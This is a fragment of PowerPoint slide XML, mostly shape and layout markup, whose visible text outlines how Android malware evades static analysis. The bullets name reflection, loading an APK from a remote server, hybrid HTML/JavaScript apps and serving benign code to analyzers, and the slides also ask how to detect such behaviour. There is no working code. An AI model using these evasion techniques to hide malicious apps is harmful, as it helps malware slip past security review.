                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>, data2);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New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698501" y="1073881"/>
            <a:ext cx="8191499" cy="3527869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the Static Analysis FP/FN tradeoff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Arrays, files, etc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540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Evading Static Analysis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Exploiting the Static Analysis FP/FN tradeoff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arrays, files, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Malicious code is never made available by a pure static analyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically load an APK from the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hybrid apps - HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; JavaScript (also applicable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>iOS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52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52217" y="2183383"/>
            <a:ext cx="1920558" cy="530179"/>
            <a:chOff x="1852217" y="2414883"/>
            <a:chExt cx="1920558" cy="530179"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="351" name="Right Arrow 350"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852217" y="2414883"/>
              <a:ext cx="1920558" cy="530179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29167" y="2510627"/>
              <a:ext cx="1664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Get code to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="12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execute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35577" y="2614850"/>
            <a:ext cx="1920558" cy="530179"/>
            <a:chOff x="2035577" y="2846350"/>
            <a:chExt cx="1920558" cy="530179"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="348" name="Right Arrow 347"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2035577" y="2846350"/>
              <a:ext cx="1920558" cy="530179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2123176" y="2940364"/>
              <a:ext cx="1803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Naïve code returned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61888"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6F5D2B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How to detect malicious behavior,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6F5D2B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6F5D2B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>if it does not happen?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="6F5D2B"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs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854003" y="1698025"/>
            <a:ext cx="1138666" cy="1836415"/>
            <a:chOff x="715320" y="2622867"/>
            <a:chExt cx="1138666" cy="1836415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="715320" y="2622867"/>
              <a:ext cx="1138666" cy="18364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/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr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824528" y="2948407"/>
              <a:ext cx="875984" cy="1467086"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709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2266051" y="1468556"/>
                <a:ext cx="2198318" cy="36638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10" name="Trapezoid 109"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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8" name="Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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0" name="Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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1" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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2" name="Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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3" name="Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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/>
                  <a:cs typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p: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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="TextBox 138"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="746758" y="2652057"/>
              <a:ext cx="10965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Analyzer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1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52477" y="50285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0" name="Right Arrow 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5093520" y="1914173"/>
            <a:ext cx="1102489" cy="2099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Right Arrow 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5104046" y="2570682"/>
            <a:ext cx="2700075" cy="2099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ight Arrow 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4969564" y="3201699"/>
            <a:ext cx="1244409" cy="2099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6285936" y="1305693"/>
            <a:ext cx="802905" cy="1196927"/>
            <a:chOff x="5504931" y="3026052"/>
            <a:chExt cx="802905" cy="1196927"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5504931" y="3026052"/>
              <a:ext cx="802905" cy="11969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5581162" y="3075558"/>
              <a:ext cx="666021" cy="1115443"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709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2266051" y="1468556"/>
                <a:ext cx="2198318" cy="36638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Trapezoid 173"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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 180"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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>
